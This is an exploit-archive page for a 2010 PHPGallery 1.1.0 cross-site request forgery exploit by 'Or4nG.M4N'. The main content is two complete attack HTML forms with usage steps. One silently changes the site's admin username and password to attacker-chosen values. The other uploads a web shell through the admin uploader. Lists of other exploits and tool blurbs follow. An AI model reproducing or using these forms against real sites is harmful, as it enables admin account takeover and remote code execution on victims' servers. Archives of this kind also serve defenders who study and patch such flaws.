Menu

Search for hundreds of thousands of exploits

"PHPGallery 1.1.0 - Cross-Site Request Forgery"

Author

Exploit author

Or4nG.M4N

Platform

Exploit platform

php

Release date

Exploit published date

2010-11-19

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
-------------------------------------------------------------------------
# Software      : phpgallery v 1.1.0                                                                                :                                               
# Author        : Or4nG.M4N                                               
# Date          : n/a    
# Dork          : Forbidden   
# Software Link: http://www.hotscripts.com/listing/phpgallery/                                                                                          :
-------------------------------------------------------------------------
  +---+[REMOTE CSRF Change Admin Password by OR4NG.M4N]+---+
<html>                                                                     
<head>                                                                     
<title>REMOTE CSRF Change Admin Password by OR4NG.M4N</head>               
<body>                                                                     
<form action="http://domain/[pwd]/admin/do_change_info.php" method="post"> 
<br>                                                                       
<input name="username" id="username" type="text" value="Or4nG" >           
<br>                                                                       
<input name="password" id="password" type="password" value="Ro0t" >        
<br>                                                                     
<input name="submit" onclick="MM_validateForm('username','','R','password','','R');return document.MM_returnValue" value="Submit" type="submit">

how to use: copy This code and seve in file csrf.html > and open Enjoy


          +---+[REMOTE CSRF upload ShElL by OR4NG.M4N]+---+   
<html>                                                                     
<head>                                                                     
<title>REMOTE CSRF upload ShElL by OR4NG.M4N</head>               
<body>		  
 <form enctype="multipart/form-data" action="http://domain/[pwd]/admin/uploader.php" method="POST">
Choose a file to upload to the gallery:<br>                                
<input name="uploadedfile" type="file" />                                  
<p align="left">Picture Caption:<br>                                       
<input name="caption" type="text" id="caption" size="45">                  
<p align="left">                                                           
<input name="Submit" type="submit" id="Submit" onClick="MM_showHideLayers('loading','','show')" value="Upload File" />

how to use: copy This code and seve in file csrf.html > and open Enjoy

--------------------------------------------------------
# Email - priv8te@hotmail.com
# GreeTz 2 - i-Hmx - Demetre - SadhacKer - The injector ]
# P0c TeaM - SarBoT511 - YoU - RGH - MY ]
# Home - www.v4-team.com - p0c.cc - inj3ct0r.com ]
---------------------------------------------------------
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-01-16 "Online Book Store 1.0 - Arbitrary File Upload" webapps php Or4nG.M4N
2012-01-30 "4Images 1.7.6-9 - Cross-Site Request Forgery / PHP Code Injection" webapps php Or4nG.M4N
2012-01-22 "MiniCMS 1.0/2.0 - PHP Code Injection" webapps php Or4nG.M4N
2012-01-21 "PHP iReport 1.0 - Remote Html Code Injection" webapps php Or4nG.M4N
2012-01-21 "iSupport 1.x - Cross-Site Request Forgery / HTML Code Injection (Add Admin)" webapps php Or4nG.M4N
2012-01-16 "PHPDomainRegister 0.4a-RC2-dev - Multiple Vulnerabilities" webapps php Or4nG.M4N
2012-01-10 "Pragyan CMS 3.0 - Remote File Disclosure" webapps php Or4nG.M4N
2011-11-03 "Jara 1.6 - Multiple Vulnerabilities" webapps php Or4nG.M4N
2011-07-09 "Portix-CMS 1.5.0. rc5 - Local File Inclusion" webapps php Or4nG.M4N
2011-01-15 "ViArt Shop 4.0.5 - Cross-Site Request Forgery" webapps php Or4nG.M4N
2010-11-19 "Plogger Gallery 1.0 - Cross-Site Request Forgery (Change Admin Password)" webapps php Or4nG.M4N
2010-11-19 "PHPGallery 1.1.0 - Cross-Site Request Forgery" webapps php Or4nG.M4N
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.